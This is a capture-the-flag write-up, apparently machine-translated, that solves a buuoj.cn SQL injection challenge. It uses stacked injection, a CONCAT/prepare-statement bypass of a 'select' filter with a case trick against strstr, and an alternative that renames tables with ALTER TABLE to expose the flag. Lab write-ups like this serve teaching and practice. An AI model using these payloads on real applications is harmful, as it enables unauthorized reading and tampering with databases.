Subject address: https://buuoj.cn/challenges
Problem-solving ideas
The first step: enter the title, an input field, through the title, we can see that it is a SQL injection attack
Step 2: Test the SQL statement
Input 1' or 1=1 #, all data in the current table appears
Step 3: Use stacked injection to view the table name
-
Enter to
1';show tables;view all the tables, and found that there are two tables, one is the words table, and the other is the 1919810931114514 table.
-
Enter to
1';desc words#view the content in the words table, there are two columns of id and data.
-
Enter
1';desc1919810931114514 to#view the content in the 1919810931114514 table, there is the flag we want.
Step 4: Use select to get flag
Enter 1';select * from '1919810931114514';the flag in the acquisition table, and it was found to be intercepted. From the interception prompt, it was found that functions such as select, update, etc. were filtered.
Step 5: Use precompilation to bypass select restrictions
Enter to 1';set @sql = CONCAT('se','lect * from '1919810931114514';');prepare stmt from @sql;EXECUTE stmt;#view flag.
-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#
Found or blocked
Check the prompt and find that the strstr function is used for interception. Since strstr is not case-sensitive, changing the input to the beginning of uppercase is
equivalent to the 1';Set @sql = CONCAT('se','lect * from '1919810931114514';');Prepare stmt from @sql;EXECUTE stmt;#flag after raising the price: flag{89c5d790-b14d-4661-9fdf-4aa4e41188ff}
Idea two
When looking at the field information of the table in the third step, it is found that 1' or 1=1 #all the information in the words table will be displayed when input in the input field . It is guessed that the words table is specified when the default statement is executed. We can modify the name of the 1919810931114514 table by modifying the indicated method. For words, 1' or 1=1 #you can see the flag after execution .
Modify table name
principle
修改表名(将表名user改为users)
alter table user rename to users;
修改列名(将字段名username改为name)
alter table users change uesrname name varchar(30);
Specific statement
1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
拆分开来如下
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#
Query flag
Enter and 1' or 1=1 #you can see the flag
Stack injection principle
Stacked injection, as the name suggests, is to stack statements together for query. The
principle is very simple. mysql_multi_query() supports multiple SQL statements to be executed at the same time, that is, one; separates, executes SQL statements in piles
eg:select * from users;show databases;